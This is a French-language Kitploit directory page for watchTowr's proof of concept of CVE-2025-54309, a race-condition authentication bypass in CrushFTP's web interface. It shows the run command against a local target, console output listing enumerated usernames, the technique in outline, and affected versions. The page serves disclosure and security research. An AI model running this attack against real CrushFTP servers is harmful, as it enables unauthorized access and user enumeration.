Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309 — Preuve de concept pour CVE-2025-54309, démontrant un contournement d'authentification via une condition de course dans l'interface Web de CrushFTP afin d'énumérer les utilisateurs. | Kitploit
Outils/GitHubGitHub/watchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309
Analyse des VulnérabilitésExploitationCollecte d'InformationsSécurité WebTests d'IntrusionAuthentification
GitHubwatchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309

watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309

Preuve de concept pour CVE-2025-54309, démontrant un contournement d'authentification via une condition de course dans l'interface Web de CrushFTP afin d'énumérer les utilisateurs.

Voir le dépôt
2832il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-54309

Une preuve de concept de contournement de l'authentification CrushFTP

Consultez notre article de blog pour les détails techniques

Détection en action

root@kitploit:~
python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://127.0.0.1:8082
[*] Generated new c2f value: 6XDQ
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-CrushFTP-CVE-2025-54309.py
        (*) CrushFTP Authentication Bypass Race Condition PoC
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-54309]
        
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://127.0.0.1:8082
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: qUwd
[*] NEW SESSION: c2f=qUwd
[*] EXFILTRATED 3 USERS: crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!

Description

Ce script est une preuve de concept de la CVE-2025-54309 contre les interfaces CrushFTP. En créant un ensemble de requêtes concurrentes partageant les mêmes identifiants de session, une requête pour définir la propriété du nom d'utilisateur sur « crushadmin » et une requête pour exécuter une commande authentifiée en tant que cet utilisateur, il est possible dans ce PoC d'extraire la liste des noms d'utilisateurs. Plus de détails sont décrits dans notre [article de blog] (https://labs.watchtowr.com/).

Versions concernées

  • avant 10.8.5
  • 11 avant 11.3.4_23

Plus de détails sur l'avis CrushFTP

Suivez les watchTowr Labs

Pour les dernières recherches en sécurité, suivez l'équipe des watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Télécharger l’outil